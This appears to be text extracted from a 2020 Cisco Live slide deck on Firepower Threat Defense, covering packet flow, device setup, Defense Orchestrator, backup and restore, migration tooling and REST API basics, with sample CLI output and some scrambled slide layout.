root@FTD:/home/admin# sudo sfconsole
Attaching to ASA console ... Press 'Ctrl+a then d' to
detach.
Type help or '?' for a list of available commands.
firepower# FTD CLI

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 74
NGFW Packet Flow

Datapath

TCP Intercept

L4 Decode

IP Decode,
Reassembly

L2 Decode
Inspection Engines

RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow – Defragmentation Reference

• In case a packet is fragmented, datapath fragment policy drops or reassembles the

fragments
• Datapath fragment settings are globally configured
• Global fragment settings can be overwritten by interface-specific settings

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 81
NGFW Packet Flow

Datapath

VPN Decrypt

TCP Intercept

L4 Decode

IP Decode,
Reassembly

L2 Decode
Inspection Engines

RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
BRKSEC-3032
NGFW Packet Flow

Datapath
Update Flow
Flow
Database
Route and Flow
Lookup
Cluster Flow
Redirect
VPN Decrypt
Existing

TCP Intercept

• Block – Drops traffic at a very early stage Your NGFW
• Fastpath – Bypasses advanced inspection engines Ruleset

• Used for static flow-offloading

• Dynamic flow-offload is supported from 6.3
• Analyze – Will send traffic to advanced inspection
engines
L3/4 only

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 90
NGFW Packet Flow – Prefilter Policies

Flow Creation Database
Route and Flow
Lookup
Cluster Flow
Redirect
VPN Decrypt
Existing

TCP Intercept
TCP Normalizer

L4 Decode

IP Decode, Reputation and

TCP Proxy Flow Lookup
Reassembly SI

Load-Balance to New flow

L2 Decode L2-L3 Decode
Snort
Inspection Engines

RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow – Reputation & SI

• Security Intelligence (SI) can Blacklist (drop) or Whitelist (allow) IP addresses early in
the packet processing lifetime within the Snort engine
• The Blacklist can be populated in 2 ways:
• Automatically by Intelligence Feed (Talos or custom) or List
• Manually by the FMC administrator

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 103
For Your
NGFW Packet Flow – Reputation & SI Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 104
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow

New flow Flow

Flow Creation Database
Route and Flow
Lookup
Cluster Flow
Redirect
VPN Decrypt
Existing

TCP Intercept
TCP Normalizer
Main Access
L4 Decode Policy

IP Decode, Reputation and

TCP Proxy Flow Lookup
Reassembly SI

Load-Balance to New flow

L2 Decode L2-L3 Decode
Snort
Inspection Engines

RX © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
NGFW Packet Flow – Main Access Policy

• Various Policies are applied to Main Access Policy

• Prefilter, TLS Inspection, Identities

Multiple conditions, Forward to IPS, Logging

like Application, File Policy Safe Search,
Users, Zones,… Youtube EDU

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 107
NGFW Packet Flow – ACL, Allow Action

• Allow Rule will be pushed to datapath as permit action and to advanced inspection
engine as allow action

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 108
For Your
NGFW Packet Flow – ACL, Allow Action Reference

• The rule ID correlates datapath rules with the advanced inspection rules
firepower# show access-list
access-list CSM_FW_ACL_ line 8 remark rule-id 268435456: L7 RULE:
ACP_Rule1_Allow_ICMP_App
access-list CSM_FW_ACL_ line 9 advanced permit ip host 1.1.1.1 host 2.2.2.2 rule-
id 268435456

access-list CSM_FW_ACL_ line 11 remark rule-id 268435457: L4 RULE:

ACP_Rule2_Allow_ICMP_Type
access-list CSM_FW_ACL_ line 12 advanced permit icmp host 2.2.2.2 host 3.3.3.3
echo rule-id 268435457

root@FTD:/home/admin# cat /var/sf/detection_engines/27306154-256d-11e6-9fc9-

180edde177c5/ngfw.rules
268435456 allow any 1.1.1.1 32 any any 2.2.2.2 32 any any any (appid 3501:1)
268435457 allow any 2.2.2.2 32 8 any 3.3.3.3 32 any any 1

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 109
For Your
NGFW Packet Flow – ACL, Trust Action Reference

• Trust Rule will be pushed to datapath as permit action and to advanced inspection
engine as fastpath action

firepower# show access-list

access-list CSM_FW_ACL_ line 14 remark rule-id 268435458: L7 RULE: ACP_Rule3_Trust_DNS_App
access-list CSM_FW_ACL_ line 15 advanced permit ip host 3.3.3.3 host 4.4.4.4 rule-id 268435458

root@FTD:/home/admin# cat /var/sf/detection_engines/27306154-256d-11e6-9fc9-180edde177c5/ngfw.rules

268435458 fastpath any 3.3.3.3 32 any any 4.4.4.4 32 any any any (appid 617:1)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 110
NGFW Packet Flow – ACL, Trust Action
Dynamic Flow Offload

• FTD 6.3 introduces Dynamic Flow Offload

• Dedicated hardware engine on Firepower 4100 and 9300 only
• Default dynamic offload by Snort Whitelisting
• No Inline-Interface, no Multi-Instance support
• Failover and Clustering support

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 112
Flow Offload Operation
Full Inspection
• Dynamically program Offload engine after flow establishment

Security Module
x86 CPU Complex
Full FTD or ASA Engine

New and fully Offload Flow

inspected flows instructions updates

Incoming Flow Classifier

Established
trusted flows Rewrite Engine
traffic
Smart NIC

Flow Offload
• Limited state tracking, NAT/PAT, TCP Seq Randomization
• 20-40Gbps per single TCP/UDP flow, 2.9us UDP latency, 4M tracked flows
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 113
For Your
Dynamic Flow Offload Reference

> show flow-offload flow

TCP intfc 102 src 10.1.201.10:40980 dest 192.168.40.200:22, dynamic, timestamp 5504317, packets
10, bytes 808

> show conn

1 in use, 4 most used
Inspect Snort:
preserve-connection: 1 enabled, 0 in effect, 2 most enabled, 0 most in effect
TCP INSIDE 192.168.40.200:22 OUTSIDE 10.1.201.10:40980, idle 0:05:32, bytes 6468, flags UIOoN1

Phase: 5
Type: SNORT
…
Firewall: trust/fastpath rule, id 268461071, allow
Snort id 5, NAP id 1, IPS id 0, Verdict WHITELIST
Snort Verdict: (fast-forward) fast forward this flow © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
NGFW Packet Flow – Main Access Policy Reference

• Use Prefilter Policy Fastpath rules for big “fat” flows

• Place more specific rules at the top of the Access Control Policy

• Place rules that require Snort inspection at the bottom of the policy

• Avoid excessive logging

• Be aware of rule expansion

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 120
For Your
NGFW Packet Flow – Main Access Policy Reference
Logging

Default Syslog
configuration can be
overridden

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 121
For Your
NGFW Packet Flow – Main Access Policy Reference

Identity

• Identity Policy enables user-based authentication. The user info can be obtained in
various ways:
Active Authentication Passive Authentication
Captive Portal (Basic, NTLM, Kerberos) Integration with AD (FPUA)
Remote Access VPN Integration with ISE and ISE-PIC (pxGRID)
Integration in VDI (Terminal Server Agent)
Network Discovery (Traffic based Detection)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 123
For Your
NGFW Packet Flow – Main Access Policy Reference

TLS Inspection

• TLS Inspection Policy controls which traffic will be decrypted by FTD so that other
policies (ACP, File, …) can inspect the traffic Don´t do this. Don´t
use self-signed
certificates!!!

Block TLS connections e.g.

• Used for small or mid-size networks

• Wizard-Based Guided Workflows
• Physical and virtual options
• S2S and RAVPN support
• High Availability
• API-first approach
• Mandatory for CDO
• No coexistence to FMC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 148
Cabling for FTD managed by FDM - Hardware
Connect the Interfaces

• Connect GigabitEthernet 1/1 to the

ISP/WAN modem or other outside
device, IP address is obtained using
DHCP
• Attach GigabitEthernet 1/2 to your
workstation. Obtain an IP address on
the 192.168.1.0/24 network using
DHCP
• Optional: Directly connect to the Management port. Workstation gets an address
through DHCP on the 192.168.45.0/24 network
• If you connect to a switch, ensure no other device is running a DHCP server,
because it will conflict with the one running on M1/1 or Eth 1/2

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 150
For Your
Cabling for Firepower 4100 Reference

• FTD Logical device Management interface; Any interface on the chassis for this purpose other
than the chassis management port, which is reserved for FXOS management
• Data interfaces - Connect the data interfaces to your logical device data networks. You can
configure physical interfaces, EtherChannels, and breakout ports to divide up high-capacity
interfaces
• For High Availability, use a Data interface for the failover/state link
All interfaces other than
the console port require
SFP/SFP+/QSFP
transceivers

Perform
initial FTD configuration
on the logical device
Management interface

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 156
For Your
Setting Up the System Reference

Default Interfaces by Device Model

Firepower Threat Defense device Outside Interface Inside Interface

ASA 5508/16-X GigabitEthernet1/1 GigabitEthernet1/2

ASA 5525/45/55-X GigabitEthernet0/0 GigabitEthernet0/1

VLAN1 all
Firepower 1010 Ethernet1/1
other switch ports
Firepower 1120, 1140, 1150 Ethernet1/1 Ethernet1/2

Firepower 2100 series Ethernet1/1 Ethernet1/2

Firepower 4100 series not pre-configured not pre-configured

Firepower 9300 appliance not pre-configured not pre-configured

Firepower Threat Defense Virtual GigabitEthernet0/0 GigabitEthernet0/1

GigabitEthernet1/1 and GigabitEthernet1/2 and
ISA 3000
GigabitEthernet1/3 GigabitEthernet1/4
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 159
For Your
Setting Up the System - Hardware Reference

Default Configuration Settings

Can be changed during initial

Setting Default
configuration?
Yes. You must change the default
Password for admin user Admin123
password

Management IP address 192.168.45.45 No

Management interface with the address

DHCP server for management clients No
pool 192.168.45.46 - 192.168.45.254

Inside interface IP address 192.168.1.1/24 No

Inside interface with the address pool

DHCP server for inside clients No
192.168.1.46 - 192.168.1.254
DHCP auto-configuration for inside Yes, but if you configure a static IPv4
clients. (supplies clients with addresses Enabled on outside interface address for the outside interface, DHCP
for WINS and DNS) server auto-configuration is disabled
Obtained through DHCP from Internet
Outside interface IP address Yes
Service Provider (ISP) or upstream router

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 160
For Your
Cabling for FTD managed by FDM - Virtual Reference

Connect the Interfaces

• Default configuration assumes that the

management and inside interfaces
connects to the same network using a
switch
• Connect the “Outside” data interface to
your Internet-facing gateway (i.E. edge
deployments)
• Management interface must also be connected to a gateway through which the
Internet is accessible. System licensing and database updates require Internet
access

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 161
For Your
Source to Destination Network Mapping Reference

How VMware Network Adapters and Interfaces Map to FTD Interfaces

Destination Network
Network Adapter Source Network (Physical Interface Name) Function
Network adapter 1 Management0-0 Management0/0 Management
Network adapter 2 Diagnostic0-0 Diagnostic0/0 Diagnostic
Network adapter 3 GigabitEthernet0-0 GigabitEthernet0/0 Outside data
Network adapter 4 GigabitEthernet0-1 GigabitEthernet0/1 Inside data
Network adapter 5 GigabitEthernet0-2 GigabitEthernet0/2 Data traffic
Network adapter 6 GigabitEthernet0-3 GigabitEthernet0/3 Data traffic
Network adapter 7 GigabitEthernet0-4 GigabitEthernet0/4 Data traffic
Network adapter 8 GigabitEthernet0-5 GigabitEthernet0/5 Data traffic
Network adapter 9 GigabitEthernet0-6 GigabitEthernet0/6 Data traffic
Network adapter 10 GigabitEthernet0-7 GigabitEthernet0/7 Data traffic

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 162
Demo:
Setting up FDM on a Firepower 4100
Series
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 165
For Your
Overview Security Policies Reference

• SSL Decryption
• NAT
• Decrypt Re-Sign / Known Key
• Static / Dynamic NAT
• Do Not Decrypt
• Dynamic Port Address Translation
• Block
• Identity NAT
• Identity Policy
• Access Control
• Passive Authentication
• Active Authentication • Intrusion Policies
• Balanced Security
• Security Intelligence
• Connectivity Over Security
• Source/Destination IP address
• Security Over Connectivity
• Destination URL
• Security Over Connectivity
• DNS

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 167
For Your
Access Control Rules Reference

• Source and destination IP addresses, protocol, ports and interfaces (in the form of
security zones)
• Fully-qualified domain name (FQDN) of the source or destination (in the form of a
network object)
• The application, or categories of applications, applications tagged with a particular
characteristic (client, server, web / risk or business relevance)
• Destination URL of a web request, generalized category, reputation of the target site
• User who is making the request or the user groups to which the user belongs

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 168
Access Control Rules
• Control which traffic is allowed to pass through and apply adv. services
• Access control policy to allow, trust
or block access to network
resources
• The policy consists of a set of
ordered rules, which are evaluated
from top to bottom
• The rule applied to traffic is the first
one where all the traffic criteria are
matched

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 169
Cisco Defense
Orchestrator (CDO)
Cisco Defense Orchestrator (CDO)
Cloud-based multi-device manager

• Management of security policies in

highly distributed environments
• Achieve consistent policy
implementation
• Modular Architecture
• Cloud First - Cloud Native
• Secure by Design
• Two-Factor Authentication
• Authentication calls for APIs and database
operations
• Data isolation in flight and at rest
• Separation of roles
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 191
Cisco Defense Orchestrator (CDO) Components

• CDO Cloud
• Staging platform
• Stores settings, processing, writes all changes
• Push the changes
• Never talk to the customer's devices directly

Secure Device Connector (SDC)

Secure Data
• Connector
Customer Network
• Communication to the CDO cloud
• Enables a secure connection back to your devices
Secure Data
• Cloud is available by default Connector

• On-Premise is behind firewall

Cloud SDC On-Premise SDC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 193
Secure Device Connector (SDC)
Cloud SDC

• SDC is deployed in the cloud per default

• CDO manages must allow inbound access on port 443
• or whichever port you have configured for your device management

• From IP addresses in the EMEA region or the United States

• https://defenseorchestrator.eu Secure Data
Connector

• 35.157.12.126
• 35.157.12.15

• https://defenseorchestrator.com
• 52.34.234.2
• 52.36.70.147 Cloud SDC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 194
Secure Device Connector (SDC)
On-Premises SDC

• CDO requires strict certificate checking

• No support for Web/Content Proxy between the SDC and the Internet
• Full outbound access to the Internet on TCP port 443
• Network connectivity to the management interface of the managed
device
Customer Network
• Installed on-premise, using CDO's VM or Docker images
• VM image is as OVA available in the CDO Tenant
Secure Data
Connector

On-Premise SDC

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 195
For Your
Software and Hardware Supported by CDO Reference

• Firepower Threat Defense (6.4+, 6.5+)

• ASA Firepower (ASA 5508-X, 5515-X, 5516-X, ASA 5525-X, 5545-X, 5555-X, ISA 3000)
• VMware vSphere / VMware ESXi 6.0, 6.5, or 6.7 / KVM / Microsoft Azure
• Firepower 1000/2100/4100/9300 Series

• ASA (9.5(2), 9.5(3), 9.6(x) to 9.13(x)) + Firepower Software (6.4+, 6.5+)

• Does not support the ASA Service Module (ASASM)

• Meraki Security Appliance

• MX Series
• Meraki Templates

• Amazon Web Services VPC

• Cisco IOS
https://docs.defenseorchestrator.com/Configuration_Guides/Devices_and_Services/Software_and_Hardware_Supported_by_CDO
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 196
Demo:
Onboarding a FTD Device to CDO
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 199
Detecting Out-of-Band Changes

• Changes made directly on the device without

using CDO
• Causes a conflict between the device's
configuration stored on CDO and the
configuration stored on the device itself
• CDO polls the device every 10 minutes
searching for any new changes
• CDO changes the configuration state of that
device to the "Conflict Detected" state

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 200
Automatically Accept Out-of-Band Changes

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 201
Change Log

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 203
FTD Upgrade Prerequisites

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 205
Security Analytics and Logging (SAL) - Overview

• Capture connection, intrusion, file, malware, and Security Intelligence events from
FTD devices and view them in CDO
• Events are stored in the Cisco cloud and viewable from the Event Logging page in
CDO
• Optional: Stealthwatch Cloud can
apply dynamic entity modeling Stealthwatch
Cloud
to your FTD events to generate Cisco

observations and alerts JSON

Cloud
Configuration Automation
FTD Event
SSE for FTD
Storage
Service
Logs converted to
JSON Format

NTD
Service
SDC FTD 6.4 SDC (on-prem VM)
SEC is required. It has two
containers (SDC & SEC)
FTD 6.5 can send events
directly to the Cisco cloud
FTD
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 207
For Your
SAL – Installation / Configuration Reference

• Install the Secure Event Connector on

an On-Premises SDC Virtual Machine
• Create a Syslog Server Object for Cisco
Security Analytics and Logging
• Send Firepower Threat Device Events to
CDO Events Logging
• Viewing Live and Historical Threat
Defense Events in CDO

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 208
Break – 15 Minutes
FMC Migration
via Backup and Restore
Firepower Management Center Model Migration

• Workflow to migrate configurations and events FMC 1000

• From one Firepower Management Center
model to an equivelent or higher-capacity
FMC 2600
Firepower Management Center
• Using the backup and restore feature
• Migration from KVM and Microsoft Azure is not
supported
• First introduced with Version 6.5

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 211
For Your
Supported Migration Paths Reference

Source Model Target Model

FMCv AWS FMC 1600 FMC 2600 FMC 4600 FMCv 300
AWS Yes — Yes Yes Yes Yes
FMCv 25 — Yes Yes Yes Yes Yes
FMC 1000 — — Yes Yes Yes Yes
FMC 1600 — — — Yes Yes Yes
FMC 2000 — — — Yes Yes Yes
FMC 2500 — — — Yes Yes Yes
FMC 2600 — — — — Yes Yes
FMCv 300 — — — Yes Yes —
FMC 4000 — — — — Yes —
FMC 4500 — — — — Yes —

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 212
FMC Migration Procedure
1 3 6 7
Copy the Unregister
Source FMC Disconnect
Create a generated Smart
FMC from
backup file backup file Software
network
to target Manager

2 4 5 8 9
Target FMC Disconnect Execute Connect Enable
Set up the
FMC from migration FMC to the smart
target FMC
network script network licensing

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 213
For Your
Guidelines and Limitations Reference

• If you change the FMC IP after migration, must also update the NAT configuration
between the FMC and its managed devices (for more information, see NAT Environments)
• All FMC licensing modes and High Availability setup‘s are supported - evaluation,
connected and SLR
• Must de-register licenses from the source FMC and register licenses in the target
FMC after migration
• Ensure that the target FMC has the same number of interfaces as source FMC
• Verify that the target FMC version matches the source FMC version (including patch,
VDB, and SRU)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 214
FTD
Backup and Restore
Backup and Restore Capabilities

• Physical and virtual devices

• Backed Up Data: Configurations only
• Save Backup To: Device, FMC or
remote Storage
• Scheduling via FMC or FDM
• Recurring Backup Schedule only via
FDM

• KVM, AWS, Azure, clustered Devices and Container instances are not supported!

• Platform must be the same as the one of the backup to be restored

• Best Practice: Back up to a remote location and verify transfer success

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 216
For Your
Backup file format & Backup Information File Reference

• Backup file format for standalone and HA

• Standalone : <hostname>_<timestamp>.tar
• HA Nodes : <hostname>_<PRIMARY/SECONDARY>_<timestamp>.tar
• Backup info file is placed as conf in the etc/sf path within the backup tar
• Before the restore operation is performed, the backup image using the
manifest details (combination of MODEL NUMBER & MODEL ID, SW
VERSION) will be verfied
• Backup info contents are displayed and a user confirmation is asked to the
user before actual restore is performed

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 220
CLI – restore remote-manager-backup

> restore remote-manager-backup

location This command is used to restore FTD backup file present remotely from sfr prompt
String restoring needs a file
> restore remote-manager-backup FTD-IFT_20190214124149.tar

***********************************************
Backup Details
***********************************************
Model = Cisco Firepower 2130 Threat Defense
Software Version = 6.3.0
Serial = JAD211800XX
Hostname = FTD-IFT
IP Address = 10.62.148.185
VDB Version = 299
SRU Version = 2018-08-23-001-vrt
Manager IP(s) = 10.62.148.207
Backup Date = 2019-02-14 12:41:49
Backup Filename = FTD-IFT_20190214124149.tar
***********************************************

* Caution ********

Verify that you are restoring a valid backup file. Make sure that software, SRU and VDB Versions on this device match versions from
the backup manifest before proceeding.
Restore operation will overwrite all configurations on this device with the configurations in backup. Kindly ensure the old device is
disconnected from the network to avoid
IP conflict.
**********************************************************

Are you sure you want to continue (Y/N)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 221
Device RMA
Demo
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
FTD Migration
Migration Tool Paths
Stateful Firewall to NGFW

Firepower Migration Tool Firepower managed by

Management Center FMC
Upload API Calls Deploy
Desktop
Tool

Shared FMT Firepower

Configuration Threat Defense
core engine*
Cisco
Defense Orchestrator
Template
Upload Creation Apply
Cloud
Service

managed by
FDM
CDO FMT service

*features shared in CDO depend on FTD-API and CDO support

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 226
What can I migrate to FTD?
FTD

• Supported ASA Versions: 8.4 and later (all platforms)

• Check Point OS
• Versions: R75, R76, R77, R77.10, R77.20, and R77.30
• Platform: Windows, Secure Platform, Secure Platform 2.6,Solaris, Linux, Gaia
• Supported FMC Versions: 6.2.3.3 or later

• Firepower Migration Tool has the following platform requirements:

• Windows 10 operating system or runs on a macOS version 10.13 or higher
• Google Chrome browser
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 227
For Your
Migration Workflow Steps Reference

FTD

Config Extract Device Setup Pre Tool Execution During Execution Post Migration Finish Migration
• Use the latest • Bootstrap the • Download the • Shutdown the • Review the Post • Deploy/Apply the
config file from Target Device latest build of tool source device Migration Report Cofiguration to
source device interfaces device
• Setup • Enable Cisco • Login to FMC to
• Review what is Management Success • Clear arp from verify migrated • Save Post-
supported by the Access and Telemetry connected Layer config Migration report as
tool and what connect to 2/3 infra future refrrence as
• Do not make • Migrate VPN using
needs to be Manager of Day 0 config fille
changes on the • Review the reports Migration Guides
manually Choice
management generated during • Perform
migrated • Review Pre
• Enable platform of target pre and post connectivity test to
Migration report
• Optimize the Licensing device migration ensure traffic flow
and manually
config*
• Setup Interfaces • Create an user • Carefully map the migrate the
• Choose the mapping with account with interfaces remaining relevant
manager of source device admin privellage config
• Use Build in
Choice for migration on
• Configure Optmizations like
management
Platform Do Not Migrate
platform
Settings

Pre-Migration Tasks During Migration Tasks Post Migration Tasks

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 228
ASA Configurations

• Methods to obtain an ASA configuration file:

• Export the ASA Configuration File
• Connect to the ASA from the Firepower Migration Tool

• Pre-migration report that identifies the following:

• ASA configuration items that will be fully migrated, partially migrated, unsupported for
migration and ignored for migration
• ASA configuration lines with errors lists the ASA CLIs that the tool cannot recognise; this
blocks migration
• You can rectify the issues, re-upload a new configuration

• Supports the "show tech-support" command in the manual upload method for
Multiple-Context ASA

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 229
For Your
Supported Check Point configuration Reference

• Interfaces

• Static Routes

• Objects (Network objects and groups, Service objects)

• Access Control Policy

• Global Policy - When you select this option, the source and destination zones for the ACL
policy are migrated as Any
• Zone-Based Policy - Source and Destination Zones will be migrated based on the predicative
routing mechanism*
• Network Address Translation
*Static routes, Dynamic routes, Connected routes (Network information on interfaces)
Default route are taken into consideration to derive egress zones
PBR and NAT will not be taken into consideration to map zones
Rule explosion can occur depending on nature of Source and Destination Network
Object/Group’s
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 232
End-to-End Procedure for FTD Migration
1 2 3 10 11
Launch the Map Interf., Push the
Firepower
Firepower Upload the Parse the Zones and Config to
Migration Migration ASA Config ASA Config Interface the FTD
Tool Tool Groups Device

Firepower 4
Management
Log in to Automatic Map
Center the FMC

Manual Map
5 6 7 8 9
Fetch
Fetch FMC
Global Fetch FTD Fetch FMC Fetch FMC
Interface
Domain Details Interfaces Zones
Groups
Details

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 235
Firepower
Migration Tool –
Desktop Edition
Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 237
REST API
Overview
REST API Basics

• Each policy is modelled as a resource • Sample JSON for a resource:

• Use HTTP methods (POST, GET,
PUT/PATCH, DELETE) for CRUD {
"host": {
(Create/Read/Update/Delete) "kind": "IPv4Address",
operations on a given resource },
"value": "1.10.8.10"

"kind": "object#NetworkObj",
• Uses JSON as the interface, JavaScript "name": "Demo_NObj_1190",
Object Notation }
"objectId": "Demo_NObj_1190"

• JSON objects are written in key/value

pairs

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 242
Request Structure

• Non-bulk request methods:

• GET – Retrieves data from the specified object
• PUT – Adds the supplied information to the specified object,
• returns a 404, “Resource Not Found” error, if the object does not exist
• POST – Creates the object with the supplied information
• DELETE – Deletes the specified object
• PATCH – FMC does not support it (other systems: partial modifications)

• Bulk request method:

• POST – create/update/partial-update/remove of several (1000) resource objects

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 243
REST API from FMC 6.1
Managed
Devices

• API Explorer/Browser with Example

Codes
• Packaged with FMC software, no Web
license required Browser 1. Invoke the API FMC with API
Explorer Explorer, REST
• Totally concurrent with other API
management option (FMC GUI)
• For FTD and FTDv, type of interfaces
FMC
supported depends on: 2. Use API
• Mode (Routed/Transparent) Explorer UI for
making REST API
• Form-factor (Physical/Virtual) Calls

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 244
Supported Features in FMC 6.1

Feature Access Rights

• Management for: C(register) RUD(Deregister)
FTD
Setup Device
• Device Group - CRUD
• Firepower Services Read only for FTD, CRUD on FP
Firepower appliances Interfaces
• Appliance/Services
• Gathers information about devices, Access
objects and several types of policies Control Policy CRUD
and Rules
• Creates access control policies and
access control policy rules IPS Policy Read only on All
• Deploys policies to devices Deploy Supported on All
Operational
Status - Supported on All
Statistics
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 245
Supported Features from FMC 6.4 and 6.5

• Added REST API objects to support • From 6.5:

Version 6.4 features: • Regional clouds
• Manage Cisco Threat Response integration • Added the following REST API objects to
• Manage chassis clustering support older features:
• Manage hit count statistics for access • Categories for access control rules
control and prefilter rules • Domains and policy inheritance
• Manage logging settings for access control • Prefilter policies
policies
• VLAN interfaces (available on a Firepower
• 6.4: New API Explorer based on the 1010 device)
OpenAPI Specification (OAS)
• you now use CodeGen to generate sample
code, You can still access the legacy API
Explorer if you prefer

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 249
Best Practices

• Keep UI users and script users

separate, especially do not use the
admin account as an API user
• Do not give script users more privilege
than needed
• Always validate the content coming
from the server
• There is no specific REST API role for
admins
• REST VDI has a special role

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 250
API Explorer
Free tool built into the FMC that can be used to use the REST API

• https://<FMC_IP_or_name>:<https_port>/api/api-explorer

Sample code in Perl

and Python
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 252
API Explorer from 6.4 Legacy Explorer

Specification in
JSON

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 253
Preloaded
parameters

Execute a test
request

Detailed response

HTTP GET Request, get Access token

(username, password)
Authenticate
• Set the API client to make a POST user

command to this URL: HTTP 200 OK, Access and

https://<FMC_IP_or_name>/api/fmc_platfor Refresh tokens

m/v1/auth/generatetoken Request for Access to the resource

(Access token) Validate
• Include the username and password as a Access
token
basic authentication header, the POST body Appropriate HTTP response
Give access to Resource
should be blank In case of
access HTTP POST Generate new Access token
• Add the header X-auth-access- token
Validate
Access and
token:<authentication token value> in expires Refresh
tokens
requests to the API Generate
Access and
• Tokens are valid for 30 minutes, and can be Refresh
tokens
refreshed up to three times HTTP 200 OK Return Access
and Refresh tokens
On Error it gives Code 401 (Unauthorized User)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 255
Token and Domain UUID Postman plugin:

• When you retrieve the token, the

domains’ UUIDs (Universally Unique
Identifier) for which the user is
authorized are sent in the HTTP header
along with the tokens
• Using your API credentials (username
and password), the return headers will
include domain details

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 256
Request and Response Format
Access Control Policy
For example, for bulk, if it is
supported: bulk=true
• Request format:
https://{host}:{port}/{object_url}/{object_uuid}?{options}

• Response: Hierarchical structure with IDs

"items": [
{
Domain UUID
"type": "AccessPolicy",
"links": {
"self": "https://10.62.42.172/api/fmc_config/v1/domain/e276abec-e0f2-11e3-8169-
6d9ed49b625f/policy/accesspolicies/005056AE-729E-0ed3-0000-008589934871"
},
"name": "ACCESS_POLICY_1", Each object has own unique ID
"id": "005056AE-729E-0ed3-0000-008589934871"
},
{
Each object has own unique URL
"type": "AccessPolicy",
"links": {
